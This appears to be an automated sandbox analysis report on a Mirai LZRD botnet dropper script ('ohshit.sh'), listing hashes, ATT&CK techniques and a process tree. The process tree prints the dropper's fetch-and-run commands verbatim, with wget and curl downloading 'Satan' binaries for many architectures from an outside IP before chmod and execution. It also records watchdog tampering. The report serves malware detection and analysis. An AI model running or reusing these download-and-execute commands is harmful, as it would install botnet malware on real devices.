mirai | eb177007a8b2654ecbbfb91246abae4052bea475b54af2fe2c9e4058ba79ac82

Analysis

max time kernel
136s
max time network
143s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
14-11-2024 00:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

c6fded176e564c4f582523ba198be43d
SHA1

e10b19d975f65e398b0a928f5e03b0f83aeadd65
SHA256

eb177007a8b2654ecbbfb91246abae4052bea475b54af2fe2c9e4058ba79ac82
SHA512

e0b9fed97a3b4b035dfdd5b1c3ee36f2571949abbd081dc02fdd24b911cb5ff4aa79036f263be7ca6e388bfb9fdfd41f33f2ab567bd17b5dd164072d82333b96

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
739	chmod
758	chmod
819	chmod
746	chmod
793	chmod
866	chmod
881	chmod
887	chmod
898	chmod
904	chmod
752	chmod
843	chmod
875	chmod
774	chmod
893	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Satan	740	Satan
/tmp/Satan	747	Satan
/tmp/Satan	753	Satan
/tmp/Satan	759	Satan
/tmp/Satan	775	Satan
/tmp/Satan	795	Satan
/tmp/Satan	820	Satan
/tmp/Satan	845	Satan
/tmp/Satan	867	Satan
/tmp/Satan	876	Satan
/tmp/Satan	882	Satan
/tmp/Satan	888	Satan
/tmp/Satan	894	Satan
/tmp/Satan	899	Satan
/tmp/Satan	905	Satan

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Satan
File opened for modification	/dev/misc/watchdog	Satan

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Satan
File opened for modification	/bin/watchdog	Satan

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-5.dat	upx
behavioral4/files/fstream-6.dat	upx
behavioral4/files/fstream-7.dat	upx
behavioral4/files/fstream-8.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/16/status	Satan
File opened for reading	/proc/232/status	Satan
File opened for reading	/proc/803/status	Satan
File opened for reading	/proc/820/status	Satan
File opened for reading	/proc/67/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/13/status	Satan
File opened for reading	/proc/17/status	Satan
File opened for reading	/proc/66/status	Satan
File opened for reading	/proc/36/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/8/status	Satan
File opened for reading	/proc/9/status	Satan
File opened for reading	/proc/12/status	Satan
File opened for reading	/proc/712/status	Satan
File opened for reading	/proc/19/status	Satan
File opened for reading	/proc/23/status	Satan
File opened for reading	/proc/354/status	Satan
File opened for reading	/proc/675/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/14/status	Satan
File opened for reading	/proc/15/status	Satan
File opened for reading	/proc/5/status	Satan
File opened for reading	/proc/79/status	Satan
File opened for reading	/proc/149/status	Satan
File opened for reading	/proc/20/status	Satan
File opened for reading	/proc/321/status	Satan
File opened for reading	/proc/686/status	Satan
File opened for reading	/proc/705/status	Satan
File opened for reading	/proc/707/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/24/status	Satan
File opened for reading	/proc/167/status	Satan
File opened for reading	/proc/669/status	Satan
File opened for reading	/proc/816/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/6/status	Satan
File opened for reading	/proc/22/status	Satan
File opened for reading	/proc/379/status	Satan
File opened for reading	/proc/676/status	Satan
File opened for reading	/proc/706/status	Satan
File opened for reading	/proc/708/status	Satan
File opened for reading	/proc/37/status	Satan
File opened for reading	/proc/146/status	Satan
File opened for reading	/proc/384/status	Satan
File opened for reading	/proc/672/status	Satan
File opened for reading	/proc/18/status	Satan
File opened for reading	/proc/21/status	Satan
File opened for reading	/proc/323/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/status	Satan
File opened for reading	/proc/4/status	Satan
File opened for reading	/proc/322/status	Satan
File opened for reading	/proc/823/status	Satan
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/70/status	Satan
File opened for reading	/proc/76/status	Satan
File opened for reading	/proc/116/status	Satan

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
772	cat
778	wget
784	curl
792	cat
761	wget
762	curl

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Satan	ohshit.sh
File opened for modification	/tmp/Satan.i686	wget
File opened for modification	/tmp/Satan.mpsl	curl
File opened for modification	/tmp/Satan.m68k	curl
File opened for modification	/tmp/Satan.arm5	wget
File opened for modification	/tmp/Satan.arm7	wget
File opened for modification	/tmp/Satan.ppc	wget
File opened for modification	/tmp/Satan.arm7	curl
File opened for modification	/tmp/Satan.sh4	curl
File opened for modification	/tmp/Satan.arc	wget
File opened for modification	/tmp/Satan.mips64	curl
File opened for modification	/tmp/Satan.mpsl	wget
File opened for modification	/tmp/Satan.arm6	curl
File opened for modification	/tmp/Satan.arc	curl
File opened for modification	/tmp/Satan.x86_64	wget
File opened for modification	/tmp/Satan.mips	curl
File opened for modification	/tmp/Satan.x86	wget
File opened for modification	/tmp/Satan.arm5	curl
File opened for modification	/tmp/Satan.arm6	wget
File opened for modification	/tmp/Satan.sh4	wget
File opened for modification	/tmp/Satan.x86	curl
File opened for modification	/tmp/Satan.i686	curl
File opened for modification	/tmp/Satan.arm	wget
File opened for modification	/tmp/Satan.sparc	curl
File opened for modification	/tmp/Satan.arm	curl
File opened for modification	/tmp/Satan.ppc	curl
File opened for modification	/tmp/Satan.m68k	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Satan.x86_64	curl
File opened for modification	/tmp/Satan.mips	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:708
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:710
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.arc
  2⤵
  - Writes file to tmp directory
  PID:715
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:731
- /bin/cat
  cat Satan.arc
  2⤵
  PID:738
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:740
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.x86
  2⤵
  - Writes file to tmp directory
  PID:742
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:744
- /bin/cat
  cat Satan.x86
  2⤵
  PID:745
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:747
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.x86_64
  2⤵
  - Writes file to tmp directory
  PID:749
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/cat
  cat Satan.x86_64
  2⤵
  PID:751
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.x86 Satan.x86_64 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:753
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.i686
  2⤵
  - Writes file to tmp directory
  PID:755
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.i686
  2⤵
  - Writes file to tmp directory
  PID:756
- /bin/cat
  cat Satan.i686
  2⤵
  PID:757
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.x86 Satan.x86_64 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:759
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:761
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:762
- /bin/cat
  cat Satan.mips
  2⤵
  - System Network Configuration Discovery
  PID:772
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.x86 Satan.x86_64 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:774
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:775
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.mips64
  2⤵
  - System Network Configuration Discovery
  PID:778
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.mips64
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:784
- /bin/cat
  cat Satan.mips64
  2⤵
  - System Network Configuration Discovery
  PID:792
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.mips64 Satan.x86 Satan.x86_64 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:795
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.mpsl
  2⤵
  - Writes file to tmp directory
  PID:797
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:806
- /bin/cat
  cat Satan.mpsl
  2⤵
  PID:818
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:820
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.arm
  2⤵
  - Writes file to tmp directory
  PID:827
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:833
- /bin/cat
  cat Satan.arm
  2⤵
  PID:841
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-Y8kpNt
  2⤵
  - File and Directory Permissions Modification
  PID:843
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:845
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.arm5
  2⤵
  - Writes file to tmp directory
  PID:847
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:857
- /bin/cat
  cat Satan.arm5
  2⤵
  PID:864
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:866
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:867
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.arm6
  2⤵
  - Writes file to tmp directory
  PID:870
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:873
- /bin/cat
  cat Satan.arm6
  2⤵
  PID:874
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:876
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.arm7
  2⤵
  - Writes file to tmp directory
  PID:878
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:879
- /bin/cat
  cat Satan.arm7
  2⤵
  PID:880
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:882
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.ppc
  2⤵
  - Writes file to tmp directory
  PID:884
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.ppc
  2⤵
  - Writes file to tmp directory
  PID:885
- /bin/cat
  cat Satan.ppc
  2⤵
  PID:886
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:888
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.sparc
  2⤵
  PID:890
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.sparc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:891
- /bin/cat
  cat Satan.sparc
  2⤵
  PID:892
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sparc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:893
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:894
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.m68k
  2⤵
  - Writes file to tmp directory
  PID:895
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:896
- /bin/cat
  cat Satan.m68k
  2⤵
  PID:897
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.m68k Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sparc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:899
- /usr/bin/wget
  wget http://45.137.70.156/nice/Satan.sh4
  2⤵
  - Writes file to tmp directory
  PID:901
- /usr/bin/curl
  curl -O http://45.137.70.156/nice/Satan.sh4
  2⤵
  - Writes file to tmp directory
  PID:902
- /bin/cat
  cat Satan.sh4
  2⤵
  PID:903
- /bin/chmod
  chmod +x busybox ohshit.sh Satan Satan.arc Satan.arm Satan.arm5 Satan.arm6 Satan.arm7 Satan.i686 Satan.m68k Satan.mips Satan.mips64 Satan.mpsl Satan.ppc Satan.sh4 Satan.sparc Satan.x86 Satan.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/Satan
  ./Satan
  2⤵
  - Executes dropped EXE
  PID:905

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Satan

Filesize
37KB

MD5
82509bfc921627d6e784bae29a9ba61f

SHA1
aeadcb2cdf407a6018c8cbdb82b7d9b385f12be6

SHA256
72e5f68a809d396480993cde5c6802a046394f2e7a92320533e34de2142fa92f

SHA512
ea43e1a867b233cb4e9b338f410b494461712b66ffb11ab1c170cf7d3f7724d6e9cd71d73934b33d2e66364f40b4e5375cf06c0bf3dc40f246da72a7388aee37

Download Submit
/tmp/Satan

Filesize
36KB

MD5
a36d6912cada96cf8d7d1b4ac81d5ed4

SHA1
021a174c6fab933f38a5d644d971e42f05c445f6

SHA256
2f7cd7e67e418f444df3cb977ca175d82150d9042fc99df1fc454e2f6212338f

SHA512
dab6d68cb17c4b17049f672f23ca57f238af7a7df28d61b8650efbf13839fd14c03032712f7ffa94da5456eda82a2e8006b8f7e01cda1ce17f057fa8542153d4

Download Submit
/tmp/Satan

Filesize
37KB

MD5
a0f30582410121013dcefbd9dd77e202

SHA1
6bdaf023301546dc697c10bf642491f58b3323da

SHA256
49b23a5a004a963df243807e75a4cb3450c9242377b4eb2f2dfe274a80542dd8

SHA512
84cb36a6478f8656bbd2af41d849fb80fc3f484da7c12b79ec3fcdf765ba8ea47cecc31bbc62a190797e7c547e29626a97c1f7028a2278ac2eb3f4eacfec261c

Download Submit
/tmp/Satan

Filesize
43KB

MD5
fc8fa00d2bab0e54a11de49a7336b374

SHA1
9aa455a4b31ee6bf3e1818c2d6f735f12e7d48df

SHA256
5a4708cbd285f67c685f1e2490fad2b2613b304e0ef493c134236a1df7c38b8a

SHA512
d1cb3c771e7ea6f8ad2fb800a9d4e852045a750a0e143aeb1073990cde7ed9395c472555fb51767c245373125277420f0836fcac03a49d9b82c3b68dcdde7d65

Download Submit
/tmp/Satan

Filesize
95KB

MD5
2371b5e3624b90ac86ba4a0228f0e1d8

SHA1
88eaa697ce1953c96d1f44ec54327decb6539ed0

SHA256
7d87ba2ca57ad1d4cfb3dc2ef6d3a878b60c8f2e9240e5580a29967ab245eada

SHA512
69b9c02c070c92fab4e416436c1a25905d1c78153c945abe4a7a9cc6b1d2d95c9332bc6ec9cc82f08f4dd9ab9bb6d9e0eb34cf9128b1599404d1d7fd67d764aa

Download Submit
/tmp/Satan.arc

Filesize
113KB

MD5
6ccd2cf611113610ca7e9e6efafc43f0

SHA1
34d4a63a943b083fa733f57740643ce63d9f08c7

SHA256
1c18b60204b6deea529a26f9532b4978eb6241dc45e9a3c0a02b4c69f4544ac4

SHA512
c7439fc476482efcfeb7755331db01be3e4600eb543e495d08944492e67e8d8ed259c8b5dfa58b68b5f21e0b4b87c873b334a5dd128f8be5ae42a1a5fecef608

Download Submit
/tmp/busybox

Filesize
857KB

MD5
6ffc46165b5d9726a6607f3ea5305589

SHA1
ab127220f42e816b413dde0d17031e251a7bc98f

SHA256
80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c

SHA512
456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads